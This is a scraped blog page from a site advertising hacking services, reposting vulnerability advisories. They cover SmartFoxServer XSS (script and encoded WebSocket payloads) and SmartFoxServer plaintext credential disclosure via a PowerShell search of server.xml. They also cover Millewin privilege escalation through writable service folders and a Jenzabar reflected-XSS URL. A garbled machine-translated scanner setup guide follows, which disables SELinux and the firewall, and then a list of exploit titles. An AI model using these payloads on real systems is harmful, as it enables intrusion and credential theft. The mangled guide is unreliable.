# Exploit Title: SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS
# Date: 29.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.smartfoxserver.com
Vendor: gotoAndPlay()
Product web page: https://www.smartfoxserver.com
Affected version: Server: 2.17.0
Remote Admin: 3.2.6
SmartFoxServer 2X, Pro, Basic
Summary: SmartFoxServer (SFS) is a comprehensive SDK for
rapidly developing multiplayer games and applications
with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal
Windows Platform, Android, Java, C++ and more. SmartFoxServer
comes with a rich set of features, an impressive
documentation set, tens of examples with their source,
powerful administration tools and a very active support
forum. Born in 2004, and evolving continuously since
then, today SmartFoxServer is the leading middleware to
create large scale multiplayer games, MMOs and virtual
communities. Thanks to its simplicity of use, versatility
and performance, it currently powers hundreds of projects
all over the world, from small chats and turn-based games
to massive virtual worlds and realtime games.
Desc: Authenticated Cross-Site Scripting was discovered.
Input passed to the AdminTool console is not properly
sanitized before being returned to the user. This can be
exploited to execute arbitrary HTML code in a user's browser
session in context of an affected site.
-----------------------------------------------------------------
/ConsoleModuleReqHandler.java:
------------------------------
private String checkHTML(String data) {
if (data.indexOf(60) > -1 && data.indexOf("<span") == -1) {
data = data.replaceAll("\\<", "<");
return data.replaceAll("\\>", ">");
}
return data;
-----------------------------------------------------------------
Tested on: Windows (all) 64bit installer
Linux/Unix 64bit installer
MacOS (10.8+) 64bit installer
Java 1.8.0_281
Python 3.9.1
Python 2.7.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5626
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5626.php
29.01.2021
--
Typing payload:
<script>confirm(document.URL)
WebSocket payload:
\x80\x00\x52\x12\x00\x03\x00\x01\x63\x02\x01\x00
\x01\x61\x03\x00\x0D\x00\x01\x70\x12\x00\x03\x00
\x01\x63\x08\x00\x0C\x63\x6F\x6E\x73\x6F\x6C\x65
\x2E\x68\x69\x6E\x74\x00\x01\x72\x04\xFF\xFF\xFF
\xFF\x00\x01\x70\x12\x00\x01\x00\x01\x63\x08\x00
\x18\x3C\x73\x63\x72\x69\x70\x74\x3E\x63\x6F\x6E
\x66\x69\x72\x6D\x28\x64\x6F\x63\x75\x6D\x65\x6E
\x74\x2E\x55\x52\x4C\x29
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863153222
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: SmartFoxServer 2X 2.17.0 - Credentials Disclosure
# Date: 29.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.smartfoxserver.com
SmartFoxServer 2X 2.17.0 Credentials Disclosure
Vendor: gotoAndPlay()
Product web page: https://www.smartfoxserver.com
Affected version: Server: 2.17.0
Remote Admin: 3.2.6
SmartFoxServer 2X, Pro, Basic
Summary: SmartFoxServer (SFS) is a comprehensive SDK for
rapidly developing multiplayer games and applications
with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal
Windows Platform, Android, Java, C++ and more. SmartFoxServer
comes with a rich set of features, an impressive
documentation set, tens of examples with their source,
powerful administration tools and a very active support
forum. Born in 2004, and evolving continuously since
then, today SmartFoxServer is the leading middleware to
create large scale multiplayer games, MMOs and virtual
communities. Thanks to its simplicity of use, versatility
and performance, it currently powers hundreds of projects
all over the world, from small chats and turn-based games
to massive virtual worlds and realtime games.
Desc: The application stores sensitive information in an
unencrypted XML file called /config/server.xml. A local
attacker that has access to the current user session can
successfully disclose plain-text credentials that can be
used to bypass authentication to the affected server.
Tested on: Windows (all) 64bit installer
Linux/Unix 64bit installer
MacOS (10.8+) 64bit installer
Java 1.8.0_281
Python 3.9.1
Python 2.7.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5627
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5627.php
CWE ID: CWE-312
CWE URL: https://cwe.mitre.org/data/definitions/312.html
29.01.2021
--
PS C:\Users\t00t\SmartFoxServer_2X\SFS2X\config> Get-Content server.xml | Select-String -Pattern passw -Context 1,0
<login>sfsadmin</login>
> <password>Waddup</password>
<login>testingus</login>
> <password>123456</password>
<mailUser>username</mailUser>
> <mailPass>password</mailPass>
C:\Users\t00t\SmartFoxServer_2X\SFS2X\config>icacls server.xml
server.xml NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
LAB42\t00t:(I)(F)
# Exploit Title: Millewin 13.39.146.1 - Local Privilege Escalation
# Date: 2021-02-07
# Author: Andrea Intilangelo
# Vendor Homepage: https://www.millewin.it
# Software Homepage: https://www.millewin.it/index.php/prodotti/millewin
# Software Link: https://download.millewin.it/files/Millewin/setup/InstMille_Demo_13.39_2019PS.exe
# Version: 13.39.028 – 146.1.9
# Tested on: Microsoft Windows 10 Enterprise x64
# CVE: CVE-2021-3394
Millennium Millewin also known as "Cartella clinica"
Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a.
Affected version: 13.39.028
13.39.28.3342
13.39.146.1
-
Summary (from online translator):
Millewin represents the Professional Solution par excellence, recognized and supported by over 18,000 doctors. Millewin is able to guarantee ideal management
of the patient's medical records, it also adheres perfectly to the most recent requirements of the General Practitioner and, thanks to the latest functional
innovations, it assists the doctor in the diagnosis and management of therapy. It can be used, at no additional cost, for group medicine and at the secretarial
station. Millewin is integrated with all Regional and Corporate Projects. Millewin modules: ACN, MilleDSS, MilleAIR, Redazione e invio fatture, MilleBook.
Vuln desc:
The application is prone to insecure permissions in its folders that allows unprivileged user complete control. An attacker can exploit the vulnerability by
arbitrarily replacing file(s) invoked by service(s)/startup regkey impacted. File(s) will be executed with SYSTEM privileges.
The application is subject to insecure folders permissions issue impacting the services 'MillewinTaskService' and 'PDS Server' for Windows deployed as part of
Millewin suite (Cartella clinica) software application, and the registy runkey responsible to start update (MilleUpdater) task.
This allow an authorized but non-privileged local or remote user to execute arbitrary code with elevated privileges on the system. An attacker can easily take
advantage of the flaw arbitrarily replacing the impacted file(s) that will be executed during application startup or reboot. If successful, the malicious file(s)
would execute with the elevated privileges of the application.
The application also suffers from unquoted service path issues.
(1) Impacted executable on startup by regkey.
Any low privileged user can elevate their privileges abusing this scenario:
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value name: MilleLiveUpdate
Value data: "C:\Program Files (x86)\Millewin\MilleUpdater\MilleUpdater.exe"
(2) Impacted services.
Any low privileged user can elevate their privileges abusing any of these (also unquoted) services:
Millewin, operazioni pianificate MillewinTaskService C:\Program Files (x86)\Millewin\GestioneTaskService.exe Auto
PDS Server PDS Server C:\Program Files (x86)\Millewin\WatchDogService.exe Auto
Details:
NOME_SERVIZIO: Millewintaskservice
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\Millewin\GestioneTaskService.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : Millewin, operazioni pianificate
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
NOME_SERVIZIO: PDSserver
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\Millewin\WatchDogService.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : PDS Server
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
(3) Folder permissions.
Insecure folders permissions issue:
C:\Program Files (x86)\Millewin
BUILTIN\Users:(OI)(CI)(F)
Everyone:(OI)(CI)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE
...[SNIP]...
C:\Program Files (x86)\Millewin\MilleUpdater
BUILTIN\Users:(OI)(CI)(ID)F
Everyone:(OI)(CI)(ID)F
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE
...[SNIP]...
# Exploit Title: Jenzabar 9.2.2 - 'query' Reflected XSS.
# Date: 2021–02–06
# Exploit Author: y0ung_dst
# Vendor Homepage: https://jenzabar.com
# Version: Jenzabar — v9.2.0-v9.2.1-v9.2.2 (and maybe other versions)
# Tested on: Windows 10
# CVE : CVE-2021–26723
-Description:
A Reflected Cross-site scripting (XSS) vulnerability in Jenzabar v9.2.0 through 9.2.2. Attacker could inject web script or HTML via the query parameter (aka the Search Field). To exploit the vulnerability, someone must click the link.
-Payload used:
"><script>alert(1)</script>
-Example :
https://localhost/ics?tool=search&query="><script>alert(1)</script>
-Steps to reproduce:
1. Open a website that use Jenzabar v9.2.0 through 9.2.2.
2. In the Search Field, enter anything.
3. Edit the query by replacing the text with the payload.
4. Press Enter to trigger the alert.

- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

タイトル:アクティブな分散Webアセットスキャン
HACKER · %s · %s
システム環境:CENTOS7X64 IPアドレス:192.168.1.11
1。静的IPアドレスを設定します
[root@localhost backlion] #vi/etc/sysconfig/network-scripts/ifcfg-*
bootproto=static #dhcp to static(modify)
onboot=はい#この構成は、通常は最後の行で電源を入れるときにenableです(変更)
iPaddr=192.168.1.11 #Static IP(追加)
ゲートウェイ=192.168.1.1#デフォルトゲートウェイ。仮想マシンがインストールされている場合、それは通常2です。これはVMNET8のゲートウェイ設定です(追加)
netmask=255.255.255.0 #subnetマスク(追加)
DNS1=192.168.1.1 #DNS構成。仮想マシンをインストールする場合、DNSだけが単なるゲートウェイです。複数のDNS URLを追加する場合は、それらを追加します(追加)
2。ホスト名を設定
[root@localhost network-scripts]
1. Redisのリポジトリアドレスを設定します
[root@localhost backlion]#yumininstall epel-release
3。ファイアウォールをオフにします
[root@localhost〜]#cat/etc/selinux/config
#このファイルは、システム上のSELINUXの状態を制御します。
#selinux=これら3つの値のいずれかを取得できます3:
#執行- SELINUXセキュリティポリシーが施行されています。
#許容- SELINUXは、強制する代わりに警告を印刷します。
#無効-Selinuxポリシーはロードされていません。
selinux=disabled
#SELINUXTYPE=3つのValue:のいずれかを取得できます
#ターゲット - ターゲットプロセスが保護されています、
#最小- ターゲットポリシーの変更。選択されたプロセスのみが保護されています。
#MLS-マルチレベルのセキュリティ保護。
selinuxType=ターゲット
閉じるファイアウォール:
Systemctl stop firewalld.service #stop firewall
SystemCtl Disabled firewalld.service #disable firewallブート
4。 Redis
をインストールします [root@localhost
backlion]#yumインストールredis
構成ファイルを変更し、すべてのIPアドレスを聞く
vim /etc/redis.conf
次の行を見つけます
バインド
127.0.0.1
に変更します
0.0.0.0をバインドします
3。Redis構成認証パスワード
yumメソッドにインストールされているRedis構成ファイルは通常/etc /redis.confにあり、パスワードを追加し、デーモニズはyesと保護されたモードを設定します。
requirepass backlion
はいデーモー化
保護されたモード番号
4. Redisを開始して完了します
[root@localhost]
backlion]#redis-server /etc/redis.conf
[root@localhost]
backlion]#service redis start
自動起動をセットアップする必要がある場合
chkconfig
redis on
[root@localhost]
backlion]#yumインストールgit
[root@localhost]
バックライオン] #CD /OPT
[root@localhost backlion]#
git clone https://github.com/grayddq/publicsecscan.git
2。サーバー展開
システム環境:Ubuntux64 IPアドレス:192.168.1.12
1。Optディレクトリを入力します
root@backlion:〜#
CD /OPT
2。スキャンプロジェクトPublicsecscanをダウンロードします
root@backlion:〜#
git clone https://github.com/grayddq/publicsecscan.git
3. Publicsecscanディレクトリを入力します
root@backlion:〜#
CD Publicsecscan
4. publicsecscanをインストールします
ピップ
-r requistions.txtをインストールします
5 lib/config.py configurationファイルを構成します(Redisと電子メール(オプション)関連情報に入力します、WVS情報は無視できます
))
6。
domain.txtでスキャンする情報を入力し、いつでも更新できます
7。実行
Python
publicsecscan.py
iii。ワーカーの展開
システム環境:Win7x86 IPアドレス:192.168.1.13
1. Python 2.7.5をインストールします
https://www.python.org/ftp/python/2.7.5/python-2.7.5.msi#ここではwin7x86です
2。AWVS10.5をインストールします
リンク:https://pan.baidu.com/s/16imwwgijzyi6cr1rocd7mqパスワード:ia2m
3. Pythonモジュールを個別にインストールします
AMQP-1.4.6、
Anyjson-0.3.3、10億-3.3.0.13、Celery-3.1.7、Celery-4.1.1、Kombu-3.0.25、
Pytz-2018.4、Redis-2.10.6、Setuptools-39.2.0、XLWT-1.3.0、PIP-10.0.1
次のコマンドを使用してインストールします
Python
setup.pyインストール
私はすでにパッケージを完成させ、簡単にダウンロードするためにBaidu Netdiskにアップロードしました:
リンク:
https://pan.baidu.com/s/1sv-wudzzhmtnuua2s4fbjqパスワード:
TNBW
4。lib/config.py構成ファイルを構成します(RedisおよびWVS関連情報に入力すると、電子メール情報を無視できます。
))
5. publicsecscanディレクトリを入力し、コマンドを実行します
CMDコードディレクトリの実行、-c 1はさらに1つのWVSプロセスを表します。
セロリ
-aタスクワーカー-c 1 - loglevel=info -ofair
6。サーバーの展開での結果の結果を表示します:
出力ディレクトリデフォルト:/out/
- Read more...
- 0 comments
- 1 view

Title: Fastadmin Add import function
HACKER · %s · %s
Edit file: application\admin\controller\xxx.php
public function import(){
return parent:import(); 2: Add import_url to the corresponding JS of the module, as follows
import_url: 'class7/import',
In fact, in the new version, these are all added well. You don't need to add it.
Three: Add the import button in index.html.
a href='javascript:' class='btn btn-info btn-import {:$auth-check('class7/import')?'':'hide'}' title='{:__('import')}' i class='fa fa-arrow-circle-o-up'/i {:__('import')}/aThe effect is as follows
Four: Importing skills
Import according to fields or comments in the database.
- Read more...
- 0 comments
- 1 view

WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Microsoft Internet Explorer 11 32-bit - Use-After-Free
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

b2evolution 6.11.6 - 'plugin name' Stored XSS
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

AMD Fuel Service - 'Fuel.service' Unquote Service Path
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

- Read more...
- 0 comments
- 1 view

Online Car Rental System 1.0 - Stored Cross Site Scripting
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view

Adobe Connect 10 - Username Disclosure
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view